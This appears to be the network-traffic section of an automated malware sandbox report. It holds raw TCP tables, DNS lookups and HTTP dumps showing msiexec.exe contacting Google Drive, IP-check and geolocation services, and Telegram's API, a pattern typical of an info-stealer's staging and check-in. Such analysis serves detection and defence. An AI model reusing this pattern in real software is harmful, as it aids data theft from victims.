Jan 8, 2025 16:21:22.028919935 CET  443          49710      142.250.181.225  192.168.2.8
Jan 8, 2025 16:21:22.028928995 CET  49710        443        192.168.2.8      142.250.181.225
Jan 8, 2025 16:21:22.028939009 CET  443          49710      142.250.181.225  192.168.2.8
Jan 8, 2025 16:21:22.028964043 CET  49710        443        192.168.2.8      142.250.181.225
Jan 8, 2025 16:21:22.028995037 CET  49710        443        192.168.2.8      142.250.181.225
Jan 8, 2025 16:21:22.028999090 CET  443          49710      142.250.181.225  192.168.2.8
Jan 8, 2025 16:21:22.029045105 CET  49710        443        192.168.2.8      142.250.181.225
Jan 8, 2025 16:21:22.037076950 CET  443          49710      142.250.181.225  192.168.2.8
Jan 8, 2025 16:21:22.037136078 CET  49710        443        192.168.2.8      142.250.181.225
Jan 8, 2025 16:21:22.037142992 CET  443          49710      142.250.181.225  192.168.2.8
Jan 8, 2025 16:21:22.037156105 CET  443          49710      142.250.181.225  192.168.2.8
Jan 8, 2025 16:21:22.037182093 CET  49710        443        192.168.2.8      142.250.181.225
Jan 8, 2025 16:21:22.037208080 CET  49710        443        192.168.2.8      142.250.181.225
Jan 8, 2025 16:21:22.037214994 CET  443          49710      142.250.181.225  192.168.2.8
Jan 8, 2025 16:21:22.037257910 CET  49710        443        192.168.2.8      142.250.181.225
Jan 8, 2025 16:21:22.037367105 CET  443          49710      142.250.181.225  192.168.2.8
Jan 8, 2025 16:21:22.037412882 CET  49710        443        192.168.2.8      142.250.181.225
Jan 8, 2025 16:21:22.037420034 CET  443          49710      142.250.181.225  192.168.2.8
Jan 8, 2025 16:21:22.037461996 CET  49710        443        192.168.2.8      142.250.181.225
Jan 8, 2025 16:21:22.037468910 CET  443          49710      142.250.181.225  192.168.2.8
Jan 8, 2025 16:21:22.037512064 CET  49710        443        192.168.2.8      142.250.181.225
Jan 8, 2025 16:21:22.038237095 CET  443          49710      142.250.181.225  192.168.2.8
Jan 8, 2025 16:21:22.038286924 CET  49710        443        192.168.2.8      142.250.181.225
Jan 8, 2025 16:21:22.040283918 CET  443          49710      142.250.181.225  192.168.2.8
Jan 8, 2025 16:21:22.040332079 CET  49710        443        192.168.2.8      142.250.181.225
Jan 8, 2025 16:21:22.040338039 CET  443          49710      142.250.181.225  192.168.2.8
Jan 8, 2025 16:21:22.040380001 CET  49710        443        192.168.2.8      142.250.181.225
Jan 8, 2025 16:21:22.040386915 CET  443          49710      142.250.181.225  192.168.2.8
Jan 8, 2025 16:21:22.040431023 CET  49710        443        192.168.2.8      142.250.181.225
Jan 8, 2025 16:21:22.041915894 CET  443          49710      142.250.181.225  192.168.2.8
Jan 8, 2025 16:21:22.041970015 CET  49710        443        192.168.2.8      142.250.181.225
Jan 8, 2025 16:21:22.045552015 CET  443          49710      142.250.181.225  192.168.2.8
Jan 8, 2025 16:21:22.045598984 CET  49710        443        192.168.2.8      142.250.181.225
Jan 8, 2025 16:21:22.045604944 CET  443          49710      142.250.181.225  192.168.2.8
Jan 8, 2025 16:21:22.045644999 CET  49710        443        192.168.2.8      142.250.181.225
Jan 8, 2025 16:21:22.045644999 CET  443          49710      142.250.181.225  192.168.2.8
Jan 8, 2025 16:21:22.045655012 CET  443          49710      142.250.181.225  192.168.2.8
Jan 8, 2025 16:21:22.045696020 CET  49710        443        192.168.2.8      142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.045886040 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.045929909 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.046926022 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.046973944 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.047035933 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.047080994 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.053620100 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.053674936 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.053683043 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.053730965 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.053739071 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.053783894 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.054224968 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.054269075 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.054275036 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.054318905 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.054326057 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.054371119 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.055052042 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.055095911 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.055103064 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.055143118 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.055149078 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.055192947 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.055733919 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.055784941 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.055792093 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.055835962 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.055843115 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.055885077 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.056449890 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.056495905 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.057132006 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.057178974 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.057219028 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.057260990 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.057476044 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.057522058 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.057528973 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.057571888 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.059406042 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.059454918 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.059463024 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.059505939 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.059513092 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.059555054 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.061889887 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.061944008 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.061949968 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.061994076 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.061997890 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.062005997 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.062032938 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.062061071 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.065826893 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.065881968 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.065886021 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.065896034 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.065929890 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.066035986 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.066080093 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.070288897 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.070337057 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.070344925 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.070379019 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.070385933 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.070391893 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.070411921 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.070436954 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.070502043 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.070527077 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.070585966 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.070599079 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.070647001 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.268019915 CET4971180192.168.2.8132.226.8.169
                                                                                                                                          Jan 8, 2025 16:21:22.272947073 CET8049711132.226.8.169192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.273032904 CET4971180192.168.2.8132.226.8.169
                                                                                                                                          Jan 8, 2025 16:21:22.273201942 CET4971180192.168.2.8132.226.8.169
                                                                                                                                          Jan 8, 2025 16:21:22.277992010 CET8049711132.226.8.169192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:23.304405928 CET8049711132.226.8.169192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:23.307410955 CET4971180192.168.2.8132.226.8.169
                                                                                                                                          Jan 8, 2025 16:21:23.312194109 CET8049711132.226.8.169192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:23.580158949 CET8049711132.226.8.169192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:23.621819973 CET4971180192.168.2.8132.226.8.169
                                                                                                                                          Jan 8, 2025 16:21:23.836790085 CET49712443192.168.2.8188.114.97.3
                                                                                                                                          Jan 8, 2025 16:21:23.836839914 CET44349712188.114.97.3192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:23.837006092 CET49712443192.168.2.8188.114.97.3
                                                                                                                                          Jan 8, 2025 16:21:23.838427067 CET49712443192.168.2.8188.114.97.3
                                                                                                                                          Jan 8, 2025 16:21:23.838437080 CET44349712188.114.97.3192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:24.317670107 CET44349712188.114.97.3192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:24.317739010 CET49712443192.168.2.8188.114.97.3
                                                                                                                                          Jan 8, 2025 16:21:24.321376085 CET49712443192.168.2.8188.114.97.3
                                                                                                                                          Jan 8, 2025 16:21:24.321383953 CET44349712188.114.97.3192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:24.321708918 CET44349712188.114.97.3192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:24.325167894 CET49712443192.168.2.8188.114.97.3
                                                                                                                                          Jan 8, 2025 16:21:24.371325970 CET44349712188.114.97.3192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:24.472901106 CET44349712188.114.97.3192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:24.472969055 CET44349712188.114.97.3192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:24.473027945 CET49712443192.168.2.8188.114.97.3
                                                                                                                                          Jan 8, 2025 16:21:24.480253935 CET49712443192.168.2.8188.114.97.3
                                                                                                                                          Jan 8, 2025 16:21:24.486007929 CET4971180192.168.2.8132.226.8.169
                                                                                                                                          Jan 8, 2025 16:21:24.491024017 CET8049711132.226.8.169192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:24.754890919 CET8049711132.226.8.169192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:24.758546114 CET49713443192.168.2.8188.114.97.3
                                                                                                                                          Jan 8, 2025 16:21:24.758604050 CET44349713188.114.97.3192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:24.758790970 CET49713443192.168.2.8188.114.97.3
                                                                                                                                          Jan 8, 2025 16:21:24.759174109 CET49713443192.168.2.8188.114.97.3
                                                                                                                                          Jan 8, 2025 16:21:24.759186983 CET44349713188.114.97.3192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:24.809362888 CET4971180192.168.2.8132.226.8.169
                                                                                                                                          Jan 8, 2025 16:21:25.230787992 CET44349713188.114.97.3192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:25.233901024 CET49713443192.168.2.8188.114.97.3
                                                                                                                                          Jan 8, 2025 16:21:25.233938932 CET44349713188.114.97.3192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:25.392756939 CET44349713188.114.97.3192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:25.392838955 CET44349713188.114.97.3192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:25.392982006 CET49713443192.168.2.8188.114.97.3
                                                                                                                                          Jan 8, 2025 16:21:25.399487972 CET49713443192.168.2.8188.114.97.3
                                                                                                                                          Jan 8, 2025 16:21:25.403192043 CET4971180192.168.2.8132.226.8.169
                                                                                                                                          Jan 8, 2025 16:21:25.404401064 CET4971480192.168.2.8132.226.8.169
                                                                                                                                          Jan 8, 2025 16:21:25.408221006 CET8049711132.226.8.169192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:25.408308983 CET4971180192.168.2.8132.226.8.169
                                                                                                                                          Jan 8, 2025 16:21:25.409199953 CET8049714132.226.8.169192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:25.409266949 CET4971480192.168.2.8132.226.8.169
                                                                                                                                          Jan 8, 2025 16:21:25.409346104 CET4971480192.168.2.8132.226.8.169
                                                                                                                                          Jan 8, 2025 16:21:25.414115906 CET8049714132.226.8.169192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:26.241235018 CET8049714132.226.8.169192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:26.242645025 CET49715443192.168.2.8188.114.97.3
                                                                                                                                          Jan 8, 2025 16:21:26.242697001 CET44349715188.114.97.3192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:26.242813110 CET49715443192.168.2.8188.114.97.3
                                                                                                                                          Jan 8, 2025 16:21:26.243082047 CET49715443192.168.2.8188.114.97.3
                                                                                                                                          Jan 8, 2025 16:21:26.243093014 CET44349715188.114.97.3192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:26.293752909 CET4971480192.168.2.8132.226.8.169
                                                                                                                                          Jan 8, 2025 16:21:26.715337992 CET44349715188.114.97.3192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:26.720532894 CET49715443192.168.2.8188.114.97.3
                                                                                                                                          Jan 8, 2025 16:21:26.720563889 CET44349715188.114.97.3192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:26.853487968 CET44349715188.114.97.3192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:26.853564978 CET44349715188.114.97.3192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 8, 2025 16:21:17.608392954 CET | 53503 | 53 | 192.168.2.8 | 1.1.1.1
Jan 8, 2025 16:21:17.615252018 CET | 53 | 53503 | 1.1.1.1 | 192.168.2.8
Jan 8, 2025 16:21:18.674489975 CET | 64530 | 53 | 192.168.2.8 | 1.1.1.1
Jan 8, 2025 16:21:18.683943033 CET | 53 | 64530 | 1.1.1.1 | 192.168.2.8
Jan 8, 2025 16:21:22.257673979 CET | 58770 | 53 | 192.168.2.8 | 1.1.1.1
Jan 8, 2025 16:21:22.264601946 CET | 53 | 58770 | 1.1.1.1 | 192.168.2.8
Jan 8, 2025 16:21:23.828490019 CET | 61570 | 53 | 192.168.2.8 | 1.1.1.1
Jan 8, 2025 16:21:23.836251974 CET | 53 | 61570 | 1.1.1.1 | 192.168.2.8
Jan 8, 2025 16:21:36.129767895 CET | 49205 | 53 | 192.168.2.8 | 1.1.1.1
Jan 8, 2025 16:21:36.138704062 CET | 53 | 49205 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 8, 2025 16:21:17.608392954 CET | 192.168.2.8 | 1.1.1.1 | 0xe50d | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Jan 8, 2025 16:21:18.674489975 CET | 192.168.2.8 | 1.1.1.1 | 0x5b55 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Jan 8, 2025 16:21:22.257673979 CET | 192.168.2.8 | 1.1.1.1 | 0x3da0 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 8, 2025 16:21:23.828490019 CET | 192.168.2.8 | 1.1.1.1 | 0x86e6 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jan 8, 2025 16:21:36.129767895 CET | 192.168.2.8 | 1.1.1.1 | 0xfd13 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 8, 2025 16:21:17.615252018 CET | 1.1.1.1 | 192.168.2.8 | 0xe50d | No error (0) | drive.google.com | | 142.250.184.238 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 16:21:18.683943033 CET | 1.1.1.1 | 192.168.2.8 | 0x5b55 | No error (0) | drive.usercontent.google.com | | 142.250.181.225 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 16:21:22.264601946 CET | 1.1.1.1 | 192.168.2.8 | 0x3da0 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 8, 2025 16:21:22.264601946 CET | 1.1.1.1 | 192.168.2.8 | 0x3da0 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 16:21:22.264601946 CET | 1.1.1.1 | 192.168.2.8 | 0x3da0 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 16:21:22.264601946 CET | 1.1.1.1 | 192.168.2.8 | 0x3da0 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 16:21:22.264601946 CET | 1.1.1.1 | 192.168.2.8 | 0x3da0 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 16:21:22.264601946 CET | 1.1.1.1 | 192.168.2.8 | 0x3da0 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 16:21:23.836251974 CET | 1.1.1.1 | 192.168.2.8 | 0x86e6 | No error (0) | reallyfreegeoip.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 16:21:23.836251974 CET | 1.1.1.1 | 192.168.2.8 | 0x86e6 | No error (0) | reallyfreegeoip.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 16:21:36.138704062 CET | 1.1.1.1 | 192.168.2.8 | 0xfd13 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• drive.google.com
• drive.usercontent.google.com
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49711 | 132.226.8.169 | 80 | 3504 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 16:21:22.273201942 CET | 151 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Jan 8, 2025 16:21:23.304405928 CET | 273 | IN | HTTP/1.1 200 OK
  Date: Wed, 08 Jan 2025 15:21:23 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 8, 2025 16:21:23.307410955 CET | 127 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Jan 8, 2025 16:21:23.580158949 CET | 273 | IN | HTTP/1.1 200 OK
  Date: Wed, 08 Jan 2025 15:21:23 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 8, 2025 16:21:24.486007929 CET | 127 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Jan 8, 2025 16:21:24.754890919 CET | 273 | IN | HTTP/1.1 200 OK
  Date: Wed, 08 Jan 2025 15:21:24 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49714 | 132.226.8.169 | 80 | 3504 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 16:21:25.409346104 CET | 127 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Jan 8, 2025 16:21:26.241235018 CET | 273 | IN | HTTP/1.1 200 OK
  Date: Wed, 08 Jan 2025 15:21:26 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49716 | 132.226.8.169 | 80 | 3504 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 16:21:26.863919020 CET | 127 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Jan 8, 2025 16:21:27.971503973 CET | 273 | IN | HTTP/1.1 200 OK
  Date: Wed, 08 Jan 2025 15:21:27 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49718 | 132.226.8.169 | 80 | 3504 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 16:21:28.622235060 CET | 151 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Jan 8, 2025 16:21:29.550122976 CET | 273 | IN | HTTP/1.1 200 OK
  Date: Wed, 08 Jan 2025 15:21:29 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49720 | 132.226.8.169 | 80 | 3504 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 16:21:30.199228048 CET | 151 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Jan 8, 2025 16:21:31.035387039 CET | 273 | IN | HTTP/1.1 200 OK
  Date: Wed, 08 Jan 2025 15:21:30 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
